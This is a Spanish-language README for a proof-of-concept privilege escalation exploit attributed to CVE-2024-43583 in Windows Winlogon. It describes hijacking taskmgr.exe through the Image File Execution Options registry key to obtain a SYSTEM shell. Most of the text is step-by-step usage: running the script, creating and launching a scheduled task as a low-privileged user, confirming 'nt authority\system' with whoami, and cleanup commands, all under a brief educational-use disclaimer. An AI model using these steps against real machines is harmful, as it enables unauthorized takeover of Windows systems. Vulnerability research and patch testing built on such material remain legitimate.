
Prueba de concepto para CVE-2024-43583
Autor: No0B@ckSappi3 Instagram: No0BackSappi3
CVE-2024-43583 es una vulnerabilidad de elevación de privilegios que afecta al componente Winlogon de Microsoft. La explotación de esta falla permite a un usuario con pocos privilegios escalar sus privilegios a SYSTEM, lo que conduce al compromiso total del sistema.
Esta prueba de concepto (PoC) aprovecha el secuestro de depurador (Debugger Hijacking) mediante la clave de registro Image File Execution Options (IFEO) de Windows para reemplazar un proceso legítimo del sistema con una carga útil maliciosa.
Versiones de Windows afectadas
Windows 10 (1507 - 22H2) Windows 11 (21H2 - 24H2) Windows Server 2008 SP2 - 2022
Este exploit es solo con fines educativos y de investigación. No lo utilice en sistemas no autorizados. El uso indebido de este exploit puede ser ilegal.
Asegúrese de que Python esté instalado en el sistema de destino. Si no es así, use la versión compilada .exe.
python poc-43583.py
schtasks /create /tn "LowPrivExploit" /tr "C:\Path\To\python.exe C:\Path\To\poc-43583.py" /sc once /st 00:00 /ru lowpriv /f
schtasks /run /tn "LowPrivExploit"
Ctrl + Shift + Esc). Si tiene éxito, aparecerá un shell de SYSTEM en su lugar.Una vez que el exploit se ejecute, compruebe sus privilegios:
whoami
Salida esperada:
nt authority\system
Vuelva a ejecutar el script y seleccione la opción [2] para eliminar el secuestro.
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /f
schtasks /delete /tn "LowPrivExploit" /f
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"